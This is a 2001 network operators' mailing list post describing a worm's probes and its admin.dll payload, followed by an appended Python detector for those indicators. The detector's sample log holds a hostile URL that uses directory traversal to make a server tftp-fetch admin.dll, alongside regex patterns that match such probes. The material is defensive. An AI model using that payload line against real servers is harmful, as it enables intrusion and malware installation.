[42594] in North American Network Operators' Group


Re: Worm probes

daemon@ATHENA.MIT.EDU (Chris Grout)
Tue Sep 18 12:09:28 2001

Message-Id: <5.1.0.14.0.20010918083030.00a9b2d0@mail.chrisgrout.com>
Date: Tue, 18 Sep 2001 08:52:37 -0700
To: "Bryan Heitman" <bryanh@communitech.net>, <nanog@merit.edu>
From: Chris Grout <cgrout@chrisgrout.com>
In-Reply-To: <00d801c14055$ad3a6e10$1100a8c0@administration3>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-MDaemon-Deliver-To: nanog@merit.edu
Errors-To: owner-nanog-outgoing@merit.edu


Appears that if it gets a 404 back from its initial unicode scans, it just 
keeps looking elsewhere.  If the server responds with anything other than a 
404 (such as a 403 IP Rejected, in this case...), it attempts to get the 
server to tftp a file named "admin.dll" from the scanning system.

I pulled the admin.dll from an infected box and to my non-programming eyes, 
it appears to do at least the following (in no order):

1.  Adds the guest account to the local Administrators group and then 
activates the account
2.  Use the anonymous
3.  Makes sure c$ is shared
4.  Tries to mail a bunch of files.  HELO it uses is aabbcc.  <***  Might 
be able to use this for a quick and dirty IDS Sig***>
5.  Looks like admin.dll ends up in "c", "d" and "e".
6.  Creates a file named readme.exe which is actually a wav file (weird?)

I could be totally wrong here (and probably am) but oh well...

Chris
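A defender-side check for the two indicators mentioned in the post, added here as an example and not part of the original message: it correlates unicode-traversal probes that received something other than a 404 with a follow-on request from the same source that mentions tftp and admin.dll, and flags SMTP sessions whose HELO is aabbcc. The log lines and addresses are constructed.

```python
import re

# Constructed sample web log: (source_ip, request_path, http_status).
# Hosts 10.0.0.5 and 10.0.0.9 send unicode-encoded traversal probes; only
# 10.0.0.9 gets a non-404 (403) and then follows up with the tftp request
# for admin.dll described in the post.
SAMPLE_WEB_LOG = [
    ("10.0.0.5", "/scripts/..%c0%af../probe", 404),
    ("10.0.0.5", "/scripts/..%c1%1c../probe", 404),
    ("10.0.0.9", "/scripts/..%c0%af../probe", 403),
    ("10.0.0.9", "/scripts/..%c0%af../cmd?/c+tftp%20-i%2010.0.0.9%20GET%20admin.dll", 403),
    ("10.0.0.7", "/index.html", 200),
]

# Overlong UTF-8 encodings of "/" used in unicode directory-traversal probes
# (e.g. ..%c0%af.. or ..%c1%1c..).
UNICODE_TRAVERSAL = re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.I)
# Follow-on request asking the server to tftp admin.dll.
TFTP_FETCH = re.compile(r"tftp.*admin\.dll", re.I)


def correlate(log):
    """Return source IPs that probed, got a non-404, then requested the tftp fetch."""
    probed_not_404 = set()
    alerts = set()
    for ip, path, status in log:
        if UNICODE_TRAVERSAL.search(path) and status != 404:
            probed_not_404.add(ip)
        if TFTP_FETCH.search(path) and ip in probed_not_404:
            alerts.add(ip)
    return sorted(alerts)


def is_suspect_helo(smtp_line):
    """Flag an SMTP HELO/EHLO whose argument is the string seen in the worm's mailer."""
    m = re.match(r"\s*(?:HELO|EHLO)\s+(\S+)", smtp_line, re.I)
    return bool(m) and m.group(1).lower() == "aabbcc"


if __name__ == "__main__":
    print("tftp follow-on from:", correlate(SAMPLE_WEB_LOG))
    print("HELO aabbcc suspect:", is_suspect_helo("HELO aabbcc"))
```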
